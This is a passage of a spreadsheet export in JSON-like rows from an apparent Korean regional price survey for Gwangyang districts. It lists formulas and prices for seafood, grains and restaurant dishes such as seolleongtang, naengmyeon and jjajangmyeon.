":"1,500"}},{"$f":"옥곡면!G28","v":{"v":1750,"d":"1,750"}},{"$f":"옥곡면!H28","v":250}]
[23,"갈치","60cm 1마리",6,6,{"v":8465.833333333334,"d":"8,466"},{"v":9679.166666666666,"d":"9,679"},{"$f":"SUM(G29-F29)","v":{"v":1213.3333333333321,"d":"1,213"}},{"v":0.14332119303080998,"d":"0"},{"$f":"광양읍1!F29","v":{"v":7000,"d":"7,000"}},{"$f":"광양읍1!G29","v":{"v":7800,"d":"7,800"}},{"$f":"광양읍1!H29","v":800},{"$f":"광양읍2!F29","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍2!G29","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍2!H29","v":0},{"$f":"중마동1!F29","v":{"v":8070,"d":"8,070"}},{"$f":"중마동1!G29","v":{"v":10050,"d":"10,050"}},{"$f":"중마동1!H29","v":{"v":1980,"d":"1,980"}},{"$f":"중마동2!F29","v":{"v":15250,"d":"15,250"}},{"$f":"중마동2!G29","v":{"v":19250,"d":"19,250"}},{"$f":"중마동2!H29","v":{"v":4000,"d":"4,000"}},{"$f":"광영동!F29","v":{"v":4725,"d":"4,725"}},{"$f":"광영동!G29","v":{"v":4725,"d":"4,725"}},{"$f":"광영동!H29","v":0},{"$f":"옥곡면!F29","v":{"v":2750,"d":"2,750"}},{"$f":"옥곡면!G29","v":{"v":3250,"d":"3,250"}},{"$f":"옥곡면!H29","v":500}]
[24,"명태","40cm 1마리",6,6,{"v":3860.25,"d":"3,860"},{"$f":"IF(E30=0,0,SUM(K30,N30,Q30,T30,W30,Z30)/E30)","v":{"v":4044.4166666666665,"d":"4,044"}},{"$f":"SUM(G30-F30)","v":{"v":184.16666666666652,"d":"184"}},{"$f":"IF(F30=0,0,((G30-F30)/F30))","v":{"v":0.04770848174772787,"d":"0"}},{"$f":"광양읍1!F30","v":{"v":3800,"d":"3,800"}},{"$f":"광양읍1!G30","v":{"v":3800,"d":"3,800"}},{"$f":"광양읍1!H30","v":0},{"$f":"광양읍2!F30","v":{"v":4700,"d":"4,700"}},{"$f":"광양읍2!G30","v":{"v":4700,"d":"4,700"}},{"$f":"광양읍2!H30","v":0},{"$f":"중마동1!F30","v":{"v":3045,"d":"3,045"}},{"$f":"중마동1!G30","v":{"v":3500,"d":"3,500"}},{"$f":"중마동1!H30","v":455},{"$f":"중마동2!F30","v":{"v":4450,"d":"4,450"}},{"$f":"중마동2!G30","v":{"v":4950,"d":"4,950"}},{"$f":"중마동2!H30","v":500},{"$f":"광영동!F30","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!G30","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!H30","v":0},{"$f":"옥곡면!F30","v":{"v":3666.5,"d":"3,667"}},{"$f":"옥곡면!G30","v":{"v":3816.5,"d":"3,817"}},{"$f":"옥곡면!H30","v":150}]
[25,"고등어","30cm 1마리",6,6,{"v":3445.8333333333335,"d":"3,446"},{"v":3673.3333333333335,"d":"3,673"},{"v":227.5,"d":"228"},{"v":0.06602176541717049,"d":"0"},{"$f":"광양읍1!F31","v":{"v":2800,"d":"2,800"}},{"$f":"광양읍1!G31","v":{"v":2800,"d":"2,800"}},{"$f":"광양읍1!H31","v":0},{"$f":"광양읍2!F31","v":{"v":4550,"d":"4,550"}},{"$f":"광양읍2!G31","v":{"v":4550,"d":"4,550"}},{"$f":"광양읍2!H31","v":0},{"$f":"중마동1!F31","v":{"v":3025,"d":"3,025"}},{"$f":"중마동1!G31","v":{"v":4440,"d":"4,440"}},{"$f":"중마동1!H31","v":{"v":1415,"d":"1,415"}},{"$f":"중마동2!F31","v":{"v":4600,"d":"4,600"}},{"$f":"중마동2!G31","v":{"v":4600,"d":"4,600"}},{"$f":"중마동2!H31","v":0},{"$f":"광영동!F31","v":{"v":3200,"d":"3,200"}},{"$f":"광영동!G31","v":{"v":2900,"d":"2,900"}},{"$f":"광영동!H31","v":-300},{"$f":"옥곡면!F31","v":{"v":2500,"d":"2,500"}},{"$f":"옥곡면!G31","v":{"v":2750,"d":"2,750"}},{"$f":"옥곡면!H31","v":250}]
[26,"냉동오징어","30cm 1마리",6,6,{"v":5875.833333333333,"d":"5,876"},{"v":5956.666666666667,"d":"5,957"},{"v":80.83333333333394,"d":"81"},{"v":0.013756913912920258,"d":"0"},{"$f":"광양읍1!F32","v":{"v":5000,"d":"5,000"}},{"$f":"광양읍1!G32","v":{"v":6000,"d":"6,000"}},{"$f":"광양읍1!H32","v":1000},{"$f":"광양읍2!F32","v":{"v":5650,"d":"5,650"}},{"$f":"광양읍2!G32","v":{"v":5650,"d":"5,650"}},{"$f":"광양읍2!H32","v":0},{"$f":"중마동1!F32","v":{"v":6995,"d":"6,995"}},{"$f":"중마동1!G32","v":{"v":6960,"d":"6,960"}},{"$f":"중마동1!H32","v":-35},{"$f":"중마동2!F32","v":{"v":6885,"d":"6,885"}},{"$f":"중마동2!G32","v":{"v":6405,"d":"6,405"}},{"$f":"중마동2!H32","v":-480},{"$f":"광영동!F32","v":{"v":6000,"d":"6,000"}},{"$f":"광영동!G32","v":{"v":6000,"d":"6,000"}},{"$f":"광영동!H32","v":0},{"$f":"옥곡면!F32","v":{"v":4725,"d":"4,725"}},{"$f":"옥곡면!G32","v":{"v":4725,"d":"4,725"}},{"$f":"옥곡면!H32","v":0}]
[27,"콩","상품 1kg",4,5,{"v":11205,"d":"11,205"},{"v":10099,"d":"10,099"},{"v":-1106,"d":"-1,106"},{"v":-0.09870593485051317,"d":"-0"},{"$f":"광양읍1!F33","v":0},{"$f":"광양읍1!G33","v":0},{"$f":"광양읍1!H33","v":0},{"$f":"광양읍2!F33","v":0},{"$f":"광양읍2!G33","v":{"v":8400,"d":"8,400"}},{"$f":"광양읍2!H33","v":{"v":8400,"d":"8,400"}},{"$f":"중마동1!F33","v":{"v":17350,"d":"17,350"}},{"$f":"중마동1!G33","v":{"v":14675,"d":"14,675"}},{"$f":"중마동1!H33","v":{"v":-2675,"d":"-2,675"}},{"$f":"중마동2!F33","v":{"v":11900,"d":"11,900"}},{"$f":"중마동2!G33","v":{"v":11850,"d":"11,850"}},{"$f":"중마동2!H33","v":-50},{"$f":"광영동!F33","v":{"v":8320,"d":"8,320"}},{"$f":"광영동!G33","v":{"v":8320,"d":"8,320"}},{"$f":"광영동!H33","v":0},{"$f":"옥곡면!F33","v":{"v":7250,"d":"7,250"}},{"$f":"옥곡면!G33","v":{"v":7250,"d":"7,250"}},{"$f":"옥곡면!H33","v":0}]
[28,"고춧가루","상품 3kg",5,6,{"v":96852,"d":"96,852"},{"v":98793.33333333333,"d":"98,793"},{"v":1941.3333333333285,"d":"1,941"},{"v":0.02004432880408591,"d":"0"},{"$f":"광양읍1!F34","v":{"v":99450,"d":"99,450"}},{"$f":"광양읍1!G34","v":{"v":99450,"d":"99,450"}},{"$f":"광양읍1!H34","v":0},{"$f":"광양읍2!F34","v":0},{"$f":"광양읍2!G34","v":{"v":100000,"d":"100,000"}},{"$f":"광양읍2!H34","v":{"v":100000,"d":"100,000"}},{"$f":"중마동1!F34","v":{"v":99560,"d":"99,560"}},{"$f":"중마동1!G34","v":{"v":99560,"d":"99,560"}},{"$f":"중마동1!H34","v":0},{"$f":"중마동2!F34","v":{"v":81250,"d":"81,250"}},{"$f":"중마동2!G34","v":{"v":89750,"d":"89,750"}},{"$f":"중마동2!H34","v":{"v":8500,"d":"8,500"}},{"$f":"광영동!F34","v":{"v":96400,"d":"96,400"}},{"$f":"광영동!G34","v":{"v":96400,"d":"96,400"}},{"$f":"광영동!H34","v":0},{"$f":"옥곡면!F34","v":{"v":107600,"d":"107,600"}},{"$f":"옥곡면!G34","v":{"v":107600,"d":"107,600"}},{"$f":"옥곡면!H34","v":0}]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(M36,\"<>0\")+COUNTIF(P36,\"<>0\")+COUNTIF(S36,\"<>0\")+COUNTIF(V36,\"<>0\")+COUNTIF(Y36,\"<>0\")","v":5},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(N36,\"<>0\")+COUNTIF(Q36,\"<>0\")+COUNTIF(T36,\"<>0\")+COUNTIF(W36,\"<>0\")+COUNTIF(Z36,\"<>0\")","v":5},{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,0,{"$f":"광양읍1!F36","v":{"v":9500,"d":"9,500"}},{"$f":"광양읍1!G36","v":{"v":9500,"d":"9,500"}},0,{"$f":"광양읍2!F36","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍2!G36","v":{"v":9000,"d":"9,000"}},0,{"$f":"중마동1!F36","v":{"v":10500,"d":"10,500"}},{"$f":"중마동1!G36","v":{"v":10500,"d":"10,500"}},0,{"$f":"중마동2!F36","v":{"v":11000,"d":"11,000"}},{"$f":"중마동2!G36","v":{"v":11000,"d":"11,000"}},0,{"$f":"광영동!F36","v":{"v":10000,"d":"10,000"}},{"$f":"광영동!G36","v":{"v":10000,"d":"10,000"}},0,{"$f":"옥곡면!F36","v":0},{"$f":"옥곡면!G36","v":0},0]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(M37,\"<>0\")+COUNTIF(P37,\"<>0\")+COUNTIF(S37,\"<>0\")+COUNTIF(V37,\"<>0\")+COUNTIF(Y37,\"<>0\")","v":5},5,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,0,{"$f":"광양읍1!F37","v":{"v":9500,"d":"9,500"}},{"$f":"광양읍1!G37","v":{"v":9500,"d":"9,500"}},0,{"$f":"광양읍2!F37","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍2!G37","v":{"v":9000,"d":"9,000"}},0,{"$f":"중마동1!F37","v":{"v":9500,"d":"9,500"}},{"$f":"중마동1!G37","v":{"v":9500,"d":"9,500"}},0,{"$f":"중마동2!F37","v":{"v":10500,"d":"10,500"}},{"$f":"중마동2!G37","v":{"v":10500,"d":"10,500"}},0,{"$f":"광영동!F37","v":{"v":6500,"d":"6,500"}},{"$f":"광영동!G37","v":{"v":6500,"d":"6,500"}},0,{"$f":"옥곡면!F37","v":0},{"$f":"옥곡면!G37","v":0},0]
[3,"비빔밥","1인분(보통)",5,5,{"v":7700,"d":"7,700"},{"v":7700,"d":"7,700"},0,0,{"$f":"광양읍1!F38","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍1!G38","v":{"v":8000,"d":"8,000"}},0,{"$f":"광양읍2!F38","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍2!G38","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동1!F38","v":{"v":8500,"d":"8,500"}},{"$f":"중마동1!G38","v":{"v":8500,"d":"8,500"}},0,{"$f":"중마동2!F38","v":{"v":8250,"d":"8,250"}},{"$f":"중마동2!G38","v":{"v":8250,"d":"8,250"}},0,{"$f":"광영동!F38","v":{"v":5750,"d":"5,750"}},{"$f":"광영동!G38","v":{"v":5750,"d":"5,750"}},0,{"$f":"옥곡면!F38","v":0},{"$f":"옥곡면!G38","v":0},0]
[4,"갈비탕","1인분(보통)",5,5,{"v":13400,"d":"13,400"},{"v":13400,"d":"13,400"},0,0,{"$f":"광양읍1!F39","v":{"v":13500,"d":"13,500"}},{"$f":"광양읍1!G39","v":{"v":13500,"d":"13,500"}},0,{"$f":"광양읍2!F39","v":{"v":12000,"d":"12,000"}},{"$f":"광양읍2!G39","v":{"v":12000,"d":"12,000"}},0,{"$f":"중마동1!F39","v":{"v":13500,"d":"13,500"}},{"$f":"중마동1!G39","v":{"v":13500,"d":"13,500"}},0,{"$f":"중마동2!F39","v":{"v":14500,"d":"14,500"}},{"$f":"중마동2!G39","v":{"v":14500,"d":"14,500"}},0,{"$f":"광영동!F39","v":{"v":13500,"d":"13,500"}},{"$f":"광영동!G39","v":{"v":13500,"d":"13,500"}},0,{"$f":"옥곡면!F39","v":0},{"$f":"옥곡면!G39","v":0},0]
[5,"삼계탕","1인분(보통)",5,5,{"v":14400,"d":"14,400"},{"v":14400,"d":"14,400"},0,0,{"$f":"광양읍1!F40","v":{"v":13500,"d":"13,500"}},{"$f":"광양읍1!G40","v":{"v":13500,"d":"13,500"}},0,{"$f":"광양읍2!F40","v":{"v":13500,"d":"13,500"}},{"$f":"광양읍2!G40","v":{"v":13500,"d":"13,500"}},0,{"$f":"중마동1!F40","v":{"v":15000,"d":"15,000"}},{"$f":"중마동1!G40","v":{"v":15000,"d":"15,000"}},0,{"$f":"중마동2!F40","v":{"v":15500,"d":"15,500"}},{"$f":"중마동2!G40","v":{"v":15500,"d":"15,500"}},0,{"$f":"광영동!F40","v":{"v":14500,"d":"14,500"}},{"$f":"광영동!G40","v":{"v":14500,"d":"14,500"}},0,{"$f":"옥곡면!F40","v":0},{"$f":"옥곡면!G40","v":0},0]
[6,"된장찌개\n백반","1인분(보통)",6,6,{"v":7541.666666666667,"d":"7,542"},{"v":7541.666666666667,"d":"7,542"},0,0,{"$f":"광양읍1!F41","v":{"v":7750,"d":"7,750"}},{"$f":"광양읍1!G41","v":{"v":7750,"d":"7,750"}},0,{"$f":"광양읍2!F41","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍2!G41","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동1!F41","v":{"v":8500,"d":"8,500"}},{"$f":"중마동1!G41","v":{"v":8500,"d":"8,500"}},0,{"$f":"중마동2!F41","v":{"v":8000,"d":"8,000"}},{"$f":"중마동2!G41","v":{"v":8000,"d":"8,000"}},0,{"$f":"광영동!F41","v":{"v":8500,"d":"8,500"}},{"$f":"광영동!G41","v":{"v":8500,"d":"8,500"}},0,{"$f":"옥곡면!F41","v":{"v":4500,"d":"4,500"}},{"$f":"옥곡면!G41","v":{"v":4500,"d":"4,500"}},0]
[7,"김치찌개\n백반","1인분(보통)",6,6,{"v":7791.666666666667,"d":"7,792"},{"v":7791.666666666667,"d":"7,792"},0,0,{"$f":"광양읍1!F42","v":{"v":7750,"d":"7,750"}},{"$f":"광양읍1!G42","v":{"v":7750,"d":"7,750"}},0,{"$f":"광양읍2!F42","v":{"v":8500,"d":"8,500"}},{"$f":"광양읍2!G42","v":{"v":8500,"d":"8,500"}},0,{"$f":"중마동1!F42","v":{"v":9500,"d":"9,500"}},{"$f":"중마동1!G42","v":{"v":9500,"d":"9,500"}},0,{"$f":"중마동2!F42","v":{"v":8000,"d":"8,000"}},{"$f":"중마동2!G42","v":{"v":8000,"d":"8,000"}},0,{"$f":"광영동!F42","v":{"v":8500,"d":"8,500"}},{"$f":"광영동!G42","v":{"v":8500,"d":"8,500"}},0,{"$f":"옥곡면!F42","v":{"v":4500,"d":"4,500"}},{"$f":"옥곡면!G42","v":{"v":4500,"d":"4,500"}},0]
[8,"불고기","1인분(200g)\n공기밥 제외",5,5,{"v":23544.3,"d":"23,544"},{"v":23810.9,"d":"23,811"},{"v":266.6000000000022,"d":"267"},0,{"$f":"광양읍1!F43","v":{"v":29221.5,"d":"29,222"}},{"$f":"광양읍1!G43","v":{"v":30554.5,"d":"30,555"}},0,{"$f":"광양읍2!F43","v":{"v":27000,"d":"27,000"}},{"$f":"광양읍2!G43","v":{"v":27000,"d":"27,000"}},0,{"$f":"중마동1!F43","v":{"v":21500,"d":"21,500"}},{"$f":"중마동1!G43","v":{"v":21500,"d":"21,500"}},0,{"$f":"중마동2!F43","v":{"v":23500,"d":"23,500"}},{"$f":"중마동2!G43","v":{"v":23500,"d":"23,500"}},0,{"$f":"광영동!F43","v":{"v":16500,"d":"16,500"}},{"$f":"광영동!G43","v":{"v":16500,"d":"16,500"}},0,{"$f":"옥곡면!F43","v":0},{"$f":"옥곡면!G43","v":0},0]
[9,"등심구이","1인분(200g)\n공기밥 제외",5,5,{"v":42583.9,"d":"42,584"},{"v":42583.9,"d":"42,584"},0,0,{"$f":"광양읍1!F44","v":{"v":41999.5,"d":"42,000"}},{"$f":"광양읍1!G44","v":{"v":41999.5,"d":"42,000"}},0,{"$f":"광양읍2!F44","v":{"v":46000,"d":"46,000"}},{"$f":"광양읍2!G44","v":{"v":46000,"d":"46,000"}},0,{"$f":"중마동1!F44","v":{"v":38000,"d":"38,000"}},{"$f":"중마동1!G44","v":{"v":38000,"d":"38,000"}},0,{"$f":"중마동2!F44","v":{"v":40000,"d":"40,000"}},{"$f":"중마동2!G44","v":{"v":40000,"d":"40,000"}},0,{"$f":"광영동!F44","v":{"v":46920,"d":"46,920"}},{"$f":"광영동!G44","v":{"v":46920,"d":"46,920"}},0,{"$f":"옥곡면!F44","v":0},{"$f":"옥곡면!G44","v":0},0]
[10,"생선초밥","1인분(보통), 활어기준",5,5,{"v":15980,"d":"15,980"},{"v":15980,"d":"15,980"},0,0,{"$f":"광양읍1!F45","v":{"v":17000,"d":"17,000"}},{"$f":"광양읍1!G45","v":{"v":17000,"d":"17,000"}},0,{"$f":"광양읍2!F45","v":{"v":17000,"d":"17,000"}},{"$f":"광양읍2!G45","v":{"v":17000,"d":"17,000"}},0,{"$f":"중마동1!F45","v":{"v":15500,"d":"15,500"}},{"$f":"중마동1!G45","v":{"v":15500,"d":"15,500"}},0,{"$f":"중마동2!F45","v":{"v":17500,"d":"17,500"}},{"$f":"중마동2!G45","v":{"v":17500,"d":"17,500"}},0,{"$f":"광영동!F45","v":{"v":12900,"d":"12,900"}},{"$f":"광영동!G45","v":{"v":12900,"d":"12,900"}},0,{"$f":"옥곡면!F45","v":0},{"$f":"옥곡면!G45","v":0},0]
[11,"튀김닭","양념통닭 1마리",6,6,{"v":18583.333333333332,"d":"18,583"},{"v":18583.333333333332,"d":"18,583"},0,0,{"$f":"광양읍1!F46","v":{"v":18500,"d":"18,500"}},{"$f":"광양읍1!G46","v":{"v":18500,"d":"18,500"}},0,{"$f":"광양읍2!F46","v":{"v":19000,"d":"19,000"}},{"$f":"광양읍2!G46","v":{"v":19000,"d":"19,000"}},0,{"$f":"중마동1!F46","v":{"v":18500,"d":"18,500"}},{"$f":"중마동1!G46","v":{"v":18500,"d":"18,500"}},0,{"$f":"중마동2!F46","v":{"v":20000,"d":"20,000"}},{"$f":"중마동2!G46","v":{"v":20000,"d":"20,000"}},0,{"$f":"광영동!F46","v":{"v":18000,"d":"18,000"}},{"$f":"광영동!G46","v":{"v":18000,"d":"18,000"}},0,{"$f":"옥곡면!F46","v":{"v":17500,"d":"17,500"}},{"$f":"옥곡면!G46","v":{"v":17500,"d":"17,500"}},0]
[12,"칼국수","1인분(보통)",5,5,{"v":7550,"d":"7,550"},{"v":7550,"d":"7,550"},0,0,{"$f":"광양읍1!F47","v":{"v":7500,"d":"7,500"}},{"$f":"광양읍1!G47","v":{"v":7500,"d":"7,500"}},0,{"$f":"광양읍2!F47","v":{"v":7250,"d":"7,250"}},{"$f":"광양읍2!G47","v":{"v":7250,"d":"7,250"}},0,{"$f":"중마동1!F47","v":{"v":8000,"d":"8,000"}},{"$f":"중마동1!G47","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동2!F47","v":{"v":8000,"d":"8,000"}},{"$f":"중마동2!G47","v":{"v":8000,"d":"8,000"}},0,{"$f":"광영동!F47","v":{"v":7000,"d":"7,000"}},{"$f":"광영동!G47","v":{"v":7000,"d":"7,000"}},0,{"$f":"옥곡면!F47","v":0},{"$f":"옥곡면!G47","v":0},0]
[13,"조리라면","분식점 1인분",5,5,{"v":4080,"d":"4,080"},{"v":4080,"d":"4,080"},0,0,{"$f":"광양읍1!F48","v":{"v":4250,"d":"4,250"}},{"$f":"광양읍1!G48","v":{"v":4250,"d":"4,250"}},0,{"$f":"광양읍2!F48","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍2!G48","v":{"v":4000,"d":"4,000"}},0,{"$f":"중마동1!F48","v":{"v":3650,"d":"3,650"}},{"$f":"중마동1!G48","v":{"v":3650,"d":"3,650"}},0,{"$f":"중마동2!F48","v":{"v":4500,"d":"4,500"}},{"$f":"중마동2!G48","v":{"v":4500,"d":"4,500"}},0,{"$f":"광영동!F48","v":{"v":4000,"d":"4,000"}},{"$f":"광영동!G48","v":{"v":4000,"d":"4,000"}},0,{"$f":"옥곡면!F48","v":0},{"$f":"옥곡면!G48","v":0}]
[14,"김밥","분식점 1인분",5,5,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,0,{"$f":"광양읍1!F49","v":{"v":3000,"d":"3,000"}},{"$f":"광양읍1!G49","v":{"v":3000,"d":"3,000"}},0,{"$f":"광양읍2!F49","v":{"v":3250,"d":"3,250"}},{"$f":"광양읍2!G49","v":{"v":3250,"d":"3,250"}},0,{"$f":"중마동1!F49","v":{"v":3750,"d":"3,750"}},{"$f":"중마동1!G49","v":{"v":3750,"d":"3,750"}},0,{"$f":"중마동2!F49","v":{"v":3750,"d":"3,750"}},{"$f":"중마동2!G49","v":{"v":3750,"d":"3,750"}},0,{"$f":"광영동!F49","v":{"v":3750,"d":"3,750"}},{"$f":"광영동!G49","v":{"v":3750,"d":"3,750"}},0,{"$f":"옥곡면!F49","v":0},{"$f":"옥곡면!G49","v":0},0]
[15,"짜장면","1인분(보통)",6,6,{"v":6241.666666666667,"d":"6,242"},{"v":6241.666666666667,"d":"6,242"},0,0,{"$f":"광양읍1!F50","v":{"v":6000,"d":"6,000"}},{"$f":"광양읍1!G50","v":{"v":6000,"d":"6,000"}},0,{"$f":"광양읍2!F50","v":{"v":6000,"d":"6,000"}},{"$f":"광양읍2!G50","v":{"v":6000,"d":"6,000"}},0,{"$f":"중마동1!F50","v":{"v":7000,"d":"7,000"}},{"$f":"중마동1!G50","v":{"v":7000,"d":"7,000"}},0,{"$f":"중마동2!F50","v":{"v":5450,"d":"5,450"}},{"$f":"중마동2!G50","v":{"v":5450,"d":"5,450"}},0,{"$f":"광영동!F50","v":{"v":6000,"d":"6,000"}},{"$f":"광영동!G50","v":{"v":6000,"d":"6,000"}},0,{"$f":"옥곡면!F50","v":{"v":7000,"d":"7,000"}},{"$f":"옥곡면!G50","v":{"v":7000,"d":"7,000"}},0]
[16,"짬뽕","1인분(보통)",6,6,{"v":8241.666666666666,"d":"8,242"},{"v":8241.666666666666,"d":"8,242"},0,0,{"$f":"광양읍1!F51","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍1!G51","v":{"v":8000,"d":"8,000"}},0,{"$f":"광양읍2!F51","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍2!G51","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동1!F51","v":{"v":9000,"d":"9,000"}},{"$f":"중마동1!G51","v":{"v":9000,"d":"9,000"}},0,{"$f":"중마동2!F51","v":{"v":6950,"d":"6,950"}},{"$f":"중마동2!G51","v":{"v":6950,"d":"6,950"}},0,{"$f":"광영동!F51","v":{"v":8000,"d":"8,000"}},{"$f":"광영동!G51","v":{"v":8000,"d":"8,000"}},0,{"$f":"옥곡면!F51","v":{"v":9500,"d":"9,500"}},{"$f":"옥곡면!G51","v":{"v":9500,"d":"9,500"}},0]
[17,"탕수육","일반탕수육(보통)",6,6,{"v":21250,"d":"21,250"},{"v":21250,"d":"21,250"},0,0,{"$f":"광양읍1!F52","v":{"v":21000,"d":"21,000"}},{"$f":"광양읍1!G52","v":{"v":21000,"d":"21,000"}},0,{"$f":"광양읍2!F52","v":{"v":27000,"d":"27,000"}},{"$f":"광양읍2!G52","v":{"v":27000,"d":"27,000"}},0,{"$f":"중마동1!F52","v":{"v":21500,"d":"21,500"}},{"$f":"중마동1!G52","v":{"v":21500,"d":"21,500"}},0,{"$f":"중마동2!F52","v":{"v":19000,"d":"19,000"}},{"$f":"중마동2!G52","v":{"v":19000,"d":"19,000"}},0,{"$f":"광영동!F52","v":{"v":17500,"d":"17,500"}},{"$f":"광영동!G52","v":{"v":17500,"d":"17,500"}},0,{"$f":"옥곡면!F52","v":{"v":21500,"d":"21,500"}},{"$f":"옥곡면!G52","v":{"v":21500,"d":"21,500"}},0]
[18,"돈가스","일반돈가스,1인분",5,5,{"v":8790,"d":"8,790"},{"v":8790,"d":"8,790"},0,0,{"$f":"광양읍1!F53","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍1!G53","v":{"v":9000,"d":"9,000"}},0,{"$f":"광양읍2!F53","v":{"v":10000,"d":"10,000"}},{"$f":"광양읍2!G53","v":{"v":10000,"d":"10,000"}},0,{"$f":"중마동1!F53","v":{"v":9750,"d":"9,750"}},{"$f":"중마동1!G53","v":{"v":9750,"d":"9,750"}},0,{"$f":"중마동2!F53","v":{"v":7950,"d":"7,950"}},{"$f":"중마동2!G53","v":{"v":7950,"d":"7,950"}},0,{"$f":"광영동!F53","v":{"v":7250,"d":"7,250"}},{"$f":"광영동!G53","v":{"v":7250,"d":"7,250"}},0,{"$f":"옥곡면!F53","v":0},{"$f":"옥곡면!G53","v":0},0]
[19,"햄버거","기본형(야채,고기)",5,5,{"v":3640,"d":"3,640"},{"v":3640,"d":"3,640"},0,0,{"$f":"광양읍1!F54","v":{"v":3550,"d":"3,550"}},{"$f":"광양읍1!G54","v":{"v":3550,"d":"3,550"}},0,{"$f":"광양읍2!F54","v":{"v":4100,"d":"4,100"}},{"$f":"광양읍2!G54","v":{"v":4100,"d":"4,100"}},0,{"$f":"중마동1!F54","v":{"v":3150,"d":"3,150"}},{"$f":"중마동1!G54","v":{"v":3150,"d":"3,150"}},0,{"$f":"중마동2!F54","v":{"v":3900,"d":"3,900"}},{"$f":"중마동2!G54","v":{"v":3900,"d":"3,900"}},0,{"$f":"광영동!F54","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!G54","v":{"v":3500,"d":"3,500"}},0,{"$f":"옥곡면!F54","v":0},{"$f":"옥곡면!G54","v":0},0]
[20,"피자","기본형(야채,고기)",5,5,{"v":16280,"d":"16,280"},{"v":16280,"d":"16,280"},0,0,{"$f":"광양읍1!F55","v":{"v":18400,"d":"18,400"}},{"$f":"광양읍1!G55","v":{"v":18400,"d":"18,400"}},0,{"$f":"광양읍2!F55","v":{"v":13900,"d":"13,900"}},{"$f":"광양읍2!G55","v":{"v":13900,"d":"13,900"}},0,{"$f":"중마동1!F55","v":{"v":18950,"d":"18,950"}},{"$f":"중마동1!G55","v":{"v":18950,"d":"18,950"}},0,{"$f":"중마동2!F55","v":{"v":18200,"d":"18,200"}},{"$f":"중마동2!G55","v":{"v":18200,"d":"18,200"}},0,{"$f":"광영동!F55","v":{"v":11950,"d":"11,950"}},{"$f":"광영동!G55","v":{"v":11950,"d":"11,950"}},0,{"$f":"옥곡면!F55","v":0},{"$f":"옥곡면!G55","v":0},0]
[21,"커피(외식)","일반원두커피",6,6,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,0,{"$f":"광양읍1!F56","v":{"v":3000,"d":"3,000"}},{"$f":"광양읍1!G56","v":{"v":3000,"d":"3,000"}},0,{"$f":"광양읍2!F56","v":{"v":3150,"d":"3,150"}},{"$f":"광양읍2!G56","v":{"v":3150,"d":"3,150"}},0,{"$f":"중마동1!F56","v":{"v":3250,"d":"3,250"}},{"$f":"중마동1!G56","v":{"v":3250,"d":"3,250"}},0,{"$f":"중마동2!F56","v":{"v":3850,"d":"3,850"}},{"$f":"중마동2!G56","v":{"v":3850,"d":"3,850"}},0,{"$f":"광영동!F56","v":{"v":3250,"d":"3,250"}},{"$f":"광영동!G56","v":{"v":3250,"d":"3,250"}},0,{"$f":"옥곡면!F56","v":{"v":3000,"d":"3,000"}},{"$f":"옥곡면!G56","v":{"v":3000,"d":"3,000"}},0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",6,6,{"v":3650,"d":"3,650"},{"v":3650,"d":"3,650"},0,0,{"$f":"광양읍1!F57","v":{"v":3900,"d":"3,900"}},{"$f":"광양읍1!G57","v":{"v":3900,"d":"3,900"}},0,{"$f":"광양읍2!F57","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!G57","v":{"v":4500,"d":"4,500"}},0,{"$f":"중마동1!F57","v":{"v":3400,"d":"3,400"}},{"$f":"중마동1!G57","v":{"v":3400,"d":"3,400"}},0,{"$f":"중마동2!F57","v":{"v":3200,"d":"3,200"}},{"$f":"중마동2!G57","v":{"v":3200,"d":"3,200"}},0,{"$f":"광영동!F57","v":{"v":3250,"d":"3,250"}},{"$f":"광영동!G57","v":{"v":3250,"d":"3,250"}},0,{"$f":"옥곡면!F57","v":{"v":3650,"d":"3,650"}},{"$f":"옥곡면!G57","v":{"v":3650,"d":"3,650"}},0]
[23,"삼겹살","식육식당 200g(국내산)",6,6,{"v":15211.083333333334,"d":"15,211"},{"v":15211.083333333334,"d":"15,211"},0,0,{"$f":"광양읍1!F58","v":{"v":15250,"d":"15,250"}},{"$f":"광양읍1!G58","v":{"v":15250,"d":"15,250"}},0,{"$f":"광양읍2!F58","v":{"v":15300,"d":"15,300"}},{"$f":"광양읍2!G58","v":{"v":15300,"d":"15,300"}},0,{"$f":"중마동1!F58","v":{"v":15500,"d":"15,500"}},{"$f":"중마동1!G58","v":{"v":15500,"d":"15,500"}},0,{"$f":"중마동2!F58","v":{"v":15716.5,"d":"15,717"}},{"$f":"중마동2!G58","v":{"v":15716.5,"d":"15,717"}},0,{"$f":"광영동!F58","v":{"v":13500,"d":"13,500"}},{"$f":"광영동!G58","v":{"v":13500,"d":"13,500"}},0,{"$f":"옥곡면!F58","v":{"v":16000,"d":"16,000"}},{"$f":"옥곡면!G58","v":{"v":16000,"d":"16,000"}},0]
